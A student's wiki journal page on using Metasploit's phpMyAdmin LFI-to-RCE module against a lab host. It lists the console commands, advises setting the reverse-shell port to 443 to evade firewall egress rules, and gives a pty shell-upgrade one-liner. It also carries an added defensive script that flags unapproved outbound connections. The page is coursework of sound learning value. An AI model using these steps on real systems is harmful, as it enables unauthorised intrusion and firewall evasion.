The Metasploit Framework - tmansfield42/Tech-Journal GitHub Wiki
search <phpmyadmin>: Search for modules
grep <2018> search <phpmyadmin>: Filter search for specific disclosure years
use <exploit/multi/http/phpmyadmin_lfi_rce>: Choose a module to work with
options: Display all options for the module and check all required settings
set <RHOSTS> <10.0.5.28>: Set a setting to a value (here I am setting Remote Hosts to my target's IP)
exploit: Runs the exploit
Setting the LPORT to 443 is important because many firewalls block Metasploit's default port 4444, while sysadmins typically allow ports like 443 or 22.
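From the defender's side, this means a port-only egress rule is not enough for a server: what matters is which destinations the server itself is allowed to connect to. The following is an added example, not part of the original journal; the flow records, the policy sets and every address other than 10.0.5.28 are constructed, and it classifies connections the server initiates by destination as well as by port.

```python
# Added example: constructed flow records and hypothetical policy values.
SERVER = "10.0.5.28"               # the server address used on this page
PORT_ALLOW = {22, 443}             # port-only egress rule described above
APPROVED = {("192.0.2.80", 443)}   # hypothetical: the one destination this server needs

# Constructed sample flow log: timestamp, source, destination, destination port
FLOW_LOG = """\
2024-01-01T10:00:01 198.51.100.7 10.0.5.28 80
2024-01-01T10:00:05 10.0.5.28 203.0.113.10 4444
2024-01-01T10:00:09 10.0.5.28 203.0.113.10 443
2024-01-01T10:02:00 10.0.5.28 192.0.2.80 443
"""


def parse(log):
    """Yield (timestamp, src, dst, dport) tuples from whitespace-separated lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue  # skip malformed records rather than guessing
        yield parts[0], parts[1], parts[2], int(parts[3])


def audit(log, server=SERVER):
    """Classify each connection that the server itself initiated."""
    results = []
    for ts, src, dst, dport in parse(log):
        if src != server:
            continue  # inbound requests to the server are expected traffic
        if dport not in PORT_ALLOW:
            verdict = "blocked by port rule"
        elif (dst, dport) in APPROVED:
            verdict = "allowed, approved destination"
        else:
            # The case the port rule alone misses: an allowed port, unknown peer.
            verdict = "ALERT: passes port rule, unapproved destination"
        results.append((ts, dst, dport, verdict))
    return results


if __name__ == "__main__":
    for row in audit(FLOW_LOG):
        print(*row)
```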
Once a shell is created, typing
python3 -c 'import pty;pty.spawn("/bin/bash")'
creates a usable terminal for you to execute commands in.
Metasploit makes it really easy to automate attacks, especially if a site or service is using outdated versions of their programs. I ran into some bumps and actually chose to use this module for my first try, except I didn't set the LPORT to 443 and instead left it as 4444. The reverse TCP connection didn't work, so I ended up going down a rabbit hole trying every phpMyAdmin module and many different Apache exploits. I eventually figured out what to do and got it working.
Hand-crafted exploits are definitely harder, but you're there for the whole process, so you know if the exploit simply doesn't work or if it's another issue. I just had problems troubleshooting because it's almost too easy, which makes it hard to have a deeper level of understanding about the exploits you're using.